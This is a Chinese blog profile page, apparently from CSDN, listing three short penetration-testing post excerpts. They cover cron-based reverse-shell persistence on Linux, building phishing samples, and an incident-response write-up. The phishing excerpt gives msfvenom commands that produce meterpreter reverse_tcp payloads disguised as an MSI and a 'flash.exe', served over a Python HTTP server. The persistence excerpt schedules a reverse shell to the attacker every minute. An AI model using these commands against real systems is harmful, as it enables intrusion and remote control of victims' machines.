自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 网络渗透 权限维持技术

crontab命令用于设置周期性被执行的指令。2、linux权限维持 计划任务反弹shell。创建反弹shell脚本,vim shell.sh。记得设置的地址和端口和之前在注册表后门设置的相同。设置反弹shell任务每分钟执行一次。这里设置的是攻击机本机的ip和端口。crontab -e -u 用户名。crontab -l -u 用户名。crontab -r -u 用户名。里面的 ip和端口号要和攻击机对应。生成的rc文件是用来清除后门的。background退出。kali使用nc启动监听。

2023-12-08 22:03:04 76

原创 网络渗透 社会工程学钓鱼样本的制作

msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o diaoyexl.msi。msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=监听端口 -f exe -o flash.exe。这里解压前运行的是恶意远控木马,解压后运行的是正常的flash程序。然后python在具有恶意的msi的文件夹下开启http服务。

2023-12-08 21:54:55 520

原创 网络渗透 应急响应技术

结论:因为phpmyadmin弱口令登录导致被写入webshell。整改原因:更换mysql密码,设置mysql配置为不可写文件。发现ssh被同一ip 192.168.0.1暴力破解。整改意见:更换ssh的密码,限制同一用户多次登录。192.168.0.130登录到本机的ssh。找到配置文件,修改成对应自己的日志位置。发现历史命令记录被删除,猜测疑似被入侵。cd root 切换到root目录。su root 切换到root目录后。发现注册表被写入恶意的启动项。cd 切换到home目录下。

2023-12-08 21:08:13 62

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除